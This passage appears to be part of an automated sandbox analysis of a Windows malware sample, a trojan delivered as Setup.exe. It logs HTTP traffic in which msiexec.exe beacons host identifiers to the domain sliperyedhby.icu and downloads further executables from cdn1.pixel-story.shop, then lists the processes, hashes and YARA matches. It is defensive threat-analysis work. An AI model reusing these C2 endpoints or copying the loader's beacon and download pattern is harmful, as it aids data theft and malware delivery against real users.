Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2w0R2dk6%2B1UrHQzldRCYmGyaRLEmAcFPOzgCC7xgdgAChtPrunaY2orCF%2BWcmE37M8Y6zRjke7StgttMaoSHWPaoMsDFwiYmG%2Bgb6ES6DmoFPEhFBG8Hz%2BJd9GN5S529dVbq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e436c49af5246cc-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21392&delivery_rate=2691449&cwnd=243&unsent_bytes=0&cid=2cdb8e9ff697d909&ts=776&x=0"
2024-11-17 23:15:29 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
Data Ascii: 11ok 173.254.250.70
2024-11-17 23:15:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.16 | 49710 | 172.67.131.254 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:30 UTC | 274 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=HA08J9ZOLZ5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 5419
Host: sliperyedhby.icu
2024-11-17 23:15:30 UTC | 5419 | OUT | Data Ascii: --HA08J9ZOLZ5Content-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--HA08J9ZOLZ5Content-Disposition: form-data; name="pid"1--HA08J9ZOLZ5Content-Disposition: form-data; name="lid"tLYMe5--222new--HA08J9ZOLZ5Con
2024-11-17 23:15:31 UTC | 1009 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 23:15:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=u2pojcer95jm8blst8e886h755; expires=Thu, 13-Mar-2025 17:02:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S7u35ul9KfpAEVCgwoYCtr6Z1XIzAjK6czC%2FI5P1NAiCxCPhiYhif6DnPw3YGqaGuJMc7oA9Vvqay0dbkdNaLOXak%2FzfmI8BDK6ym8ldIqhE65k5mZ7X7%2FBLowZCpaMbEqIK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e436c53ccb76c3a-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1351&sent=6&recv=11&lost=0&retrans=0&sent_bytes=2840&recv_bytes=6329&delivery_rate=2214067&cwnd=251&unsent_bytes=0&cid=c7a0075e31b37fcd&ts=616&x=0"
2024-11-17 23:15:31 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
Data Ascii: 11ok 173.254.250.70
2024-11-17 23:15:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.16 | 49711 | 172.67.131.254 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:31 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=MUISZHMAEL50RMO2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 5473
Host: sliperyedhby.icu
2024-11-17 23:15:31 UTC | 5473 | OUT | Data Ascii: --MUISZHMAEL50RMO2Content-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--MUISZHMAEL50RMO2Content-Disposition: form-data; name="pid"1--MUISZHMAEL50RMO2Content-Disposition: form-data; name="lid"tLYMe5--222new--M
2024-11-17 23:15:32 UTC | 1009 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 23:15:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vchm7ppuntfet87jkndqv3ts8c; expires=Thu, 13-Mar-2025 17:02:11 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zq3eJFUdrG%2FDTfj5TXSlSciZUOwDA5iqHo3mh1G55JON8PJ10C7mzDHuU4ceQFuEzoM2EnNPWBs5yecYRCqQpH1zeb1vMabrIY0pdbVZwdSYt%2F5fXby%2BbHJzYRQopmqr5myH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e436c5c0943e70a-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2066&sent=6&recv=11&lost=0&retrans=0&sent_bytes=2840&recv_bytes=6388&delivery_rate=1392307&cwnd=243&unsent_bytes=0&cid=1a0a9f335e169206&ts=530&x=0"
2024-11-17 23:15:32 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
Data Ascii: 11ok 173.254.250.70
2024-11-17 23:15:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.16 | 49712 | 172.67.131.254 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:33 UTC | 272 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Z0N24YS7X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1150
Host: sliperyedhby.icu
2024-11-17 23:15:33 UTC | 1150 | OUT | Data Ascii: --Z0N24YS7XContent-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--Z0N24YS7XContent-Disposition: form-data; name="pid"1--Z0N24YS7XContent-Disposition: form-data; name="lid"tLYMe5--222new--Z0N24YS7XContent-Dis
2024-11-17 23:15:33 UTC | 1010 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:33 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ugejefg573vth5tmnnnoipq5an; expires=Thu, 13-Mar-2025 17:02:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXGHAq7K5K9vm4aPHhmbr7b0LCNfFzS00czAmZWfJ5CDcrSMUIiLrNEUqze3CN%2Fqol%2BAeBv8zx5bTNPspcgL7uuh%2BZJew3ZYVNixpvHPArYD7O3iejuCicKrjajshJISFN%2BL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c645ceb6c5e-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2058&delivery_rate=1707547&cwnd=247&unsent_bytes=0&cid=d79429597939705e&ts=543&x=0"
2024-11-17 23:15:33 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
Data Ascii: 11ok 173.254.250.70
2024-11-17 23:15:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.16 | 49713 | 172.67.131.254 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:34 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=VS4N0X5BF
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 1066
                                                                                                                                                                                                                              Host: sliperyedhby.icu
2024-11-17 23:15:34 UTC | 1066 | OUT | Data Raw: 2d 2d 56 53 34 4e 30 58 35 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 31 34 46 37 31 30 39 42 42 34 30 31 32 32 45 31 33 41 38 38 33 44 39 35 41 43 33 41 38 34 0d 0a 2d 2d 56 53 34 4e 30 58 35 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 53 34 4e 30 58 35 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 32 32 6e 65 77 0d 0a 2d 2d 56 53 34 4e 30 58 35 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                                                                                                              Data Ascii: --VS4N0X5BFContent-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--VS4N0X5BFContent-Disposition: form-data; name="pid"1--VS4N0X5BFContent-Disposition: form-data; name="lid"tLYMe5--222new--VS4N0X5BFContent-Dis
2024-11-17 23:15:34 UTC | 1015 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:34 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=oj0vu00bkoc4bitps6bfio8dcg; expires=Thu, 13-Mar-2025 17:02:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AlK5SiyqZvKHdtL2F6gzCQS5WP0qLipLGQr0zturUJXeU9FIlQLJMgO%2FProL%2Bb5SrADR84%2BsZsZn3Nr%2B%2BstZ93jH%2FidjJf3tirqXdzVJL%2FTMrt2qa0NxnSiBUPUr75OsPGT9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c6c8cd7e745-DEN
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19906&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1974&delivery_rate=154181&cwnd=32&unsent_bytes=0&cid=1cf3a0d4a0fb7e07&ts=399&x=0"
2024-11-17 23:15:34 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 30 0d 0a
Data Ascii: 11ok 173.254.250.70
2024-11-17 23:15:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.16 | 49714 | 172.67.131.254 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:35 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 115
                                                                                                                                                                                                                              Host: sliperyedhby.icu
2024-11-17 23:15:35 UTC | 115 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 32 32 6e 65 77 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63 26 68 77 69 64 3d 41 37 31 34 46 37 31 30 39 42 42 34 30 31 32 32 45 31 33 41 38 38 33 44 39 35 41 43 33 41 38 34
                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=tLYMe5--222new&j=5c9b8674a630d9101b46733aa37f15ec&hwid=A714F7109BB40122E13A883D95AC3A84
2024-11-17 23:15:36 UTC | 1015 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:35 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=q8eg4eqsch4te4s440at2p9fgi; expires=Thu, 13-Mar-2025 17:02:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PoJIqeI9Ab%2F0xJV3NPiGaAYaf%2B2v5d3jCd%2BoxzUxhlcMEh6yE9StS0%2FqfQ0uipY%2BR4FHUEb5w%2Fe4DHDsJP2HdT1tK4uNwuZj%2B5gASkyXcz8e4kor8guNuZxOATiO9OdboRDY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c734c61e750-DEN
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19051&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1016&delivery_rate=151829&cwnd=32&unsent_bytes=0&cid=2f853e7477d4a2a0&ts=549&x=0"
2024-11-17 23:15:36 UTC | 138 | IN | Data Raw: 38 34 0d 0a 65 4c 2f 31 45 39 37 6a 56 75 33 46 76 30 34 56 6d 70 2f 4d 4a 59 6d 68 72 4a 65 66 58 37 6a 6d 71 59 69 56 7a 70 49 6e 37 6b 51 6a 78 4e 64 6d 2f 4e 6c 30 68 62 48 4c 50 6d 61 67 77 2b 4e 35 70 73 4c 49 2b 61 35 78 79 49 2f 52 37 66 6e 6a 34 56 4f 42 4e 67 47 52 68 6e 75 78 6b 77 72 43 71 64 73 38 53 76 6e 76 6b 31 58 6f 67 34 43 31 2b 53 75 61 33 4a 6d 6b 74 36 75 77 48 64 38 35 4a 51 3d 3d 0d 0a
                                                                                                                                                                                                                              Data Ascii: 84eL/1E97jVu3Fv04Vmp/MJYmhrJefX7jmqYiVzpIn7kQjxNdm/Nl0hbHLPmagw+N5psLI+a5xyI/R7fnj4VOBNgGRhnuxkwrCqds8Svnvk1Xog4C1+Sua3Jmkt6uwHd85JQ==
2024-11-17 23:15:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.16 | 49715 | 172.67.185.54 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:36 UTC | 205 | OUT | GET /ldr_cp_pa HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: cdn1.pixel-story.shop
2024-11-17 23:15:37 UTC | 905 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:36 GMT
                                                                                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                                                                                              Content-Length: 182784
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              ETag: "788f99934b8d093cd298c1f3f5d85678"
                                                                                                                                                                                                                              Last-Modified: Sun, 10 Nov 2024 20:17:45 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1j2RKLwhQhSd%2Bp1AHb4Rbm%2FahWMF9SMZRUwy3Ob6zitZz%2BICRXkuSFU772EYwp8ehkD7Zg3eG5Hesjq6sNdNyloznxh2GTn9kR%2FJQr6Uf0sP9JHa3tlhxCU%2FUGkMtSYh%2FbtOfgzU784%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c7aae477d57-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1158&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2869&recv_bytes=819&delivery_rate=2358306&cwnd=251&unsent_bytes=0&cid=b3f2d4bc0fe98220&ts=382&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.16 | 49716 | 172.67.185.54 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:38 UTC | 174 | OUT | GET /runcl.bin HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                                                                                                                              Host: cdn1.pixel-story.shop
2024-11-17 23:15:39 UTC | 897 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:39 GMT
                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                              Content-Length: 943784
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              ETag: "3f58a517f1f4796225137e7659ad2adb"
                                                                                                                                                                                                                              Last-Modified: Tue, 05 Nov 2024 11:58:57 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HYBIBKDqlUv%2FSyUS5k7qABC4jHyeNTKPZYBXhFcX0EgocvOOa5YHlQjlDLkTmGloqlx6NbpU%2FJ4bvaomvCoYoxjGtzf5ieZV7grpfVvogfv3U1JrJRo5l0UfhOyvU5IGagQJKfESmm4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c88eb412e5f-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1433&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2869&recv_bytes=788&delivery_rate=1891574&cwnd=247&unsent_bytes=0&cid=d285401f0f3cdc24&ts=377&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.16 | 49717 | 172.67.185.54 | 443 | 7084 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:43 UTC | 174 | OUT | GET /clp_pa.32 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Host: cdn1.pixel-story.shop
2024-11-17 23:15:43 UTC | 868 | IN | HTTP/1.1 200 OK
Date: Sun, 17 Nov 2024 23:15:43 GMT
Content-Length: 5998227
Connection: close
Accept-Ranges: bytes
ETag: "7e51997869f0affe433246a2e5e05677"
Last-Modified: Sat, 16 Nov 2024 22:34:29 GMT
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeuzohHllKg6xjrhZBOidzXZBZv1IAOBtooLYr5M%2BUOK7ftCCC%2FBViXTKbGw4KnFqwD79ouEsPKdTkc5ABmxDaPTub5KvmSPDXh1m%2FRU%2FFPz%2BdXw1gdJbu%2FD1Dx68BxKcHHu%2FD3wWM8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e436ca54d95486e-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1192&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2871&recv_bytes=788&delivery_rate=2393388&cwnd=251&unsent_bytes=0&cid=379783f162ac64c3&ts=349&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.16 | 49718 | 104.102.49.254 | 443 | 2852 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-17 23:15:56 UTC | 125 | OUT | GET /profiles/76561198043764602 HTTP/1.1
Host: steamcommunity.com
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
2024-11-17 23:15:57 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sun, 17 Nov 2024 23:15:57 GMT
Content-Length: 46684
Connection: close
Set-Cookie: sessionid=2abd46b956da7c4ac9a2903a; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Ca05a64099ae5bec168e9113a8529411f; Path=/; Secure; HttpOnly; SameSite=None


Target ID:0
Start time:18:15:12
Start date:17/11/2024
Path:C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\Setup.exe"
Imagebase:0x8d0000
File size:8'060'800 bytes
MD5 hash:0BF89E05C575D4BCDCDADB17C7517C29
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: Windows_Trojan_Remotemanipulator_9ec52153, Description: unknown, Source: 00000000.00000000.1186904367.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
• Rule: Windows_Trojan_Remotemanipulator_9ec52153, Description: unknown, Source: 00000000.00000002.1205380161.00000000037EB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:low
Has exited:true

Target ID:2
Start time:18:15:13
Start date:17/11/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\choice.exe
Imagebase:0x380000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:3
Start time:18:15:13
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:18:15:18
Start date:17/11/2024
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\msiexec.exe
Imagebase:0x230000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:18:15:49
Start date:17/11/2024
Path:C:\Users\user\AppData\Roaming\7LUEA3.pif
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx"
Imagebase:0x840000
File size:943'784 bytes
MD5 hash:3F58A517F1F4796225137E7659AD2ADB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:13
Start time:18:15:55
Start date:17/11/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:0xd0000
File size:42'064 bytes
MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:14
Start time:18:15:55
Start date:17/11/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:0x860000
File size:42'064 bytes
MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:15
Start time:18:15:55
Start date:17/11/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:0xb00000
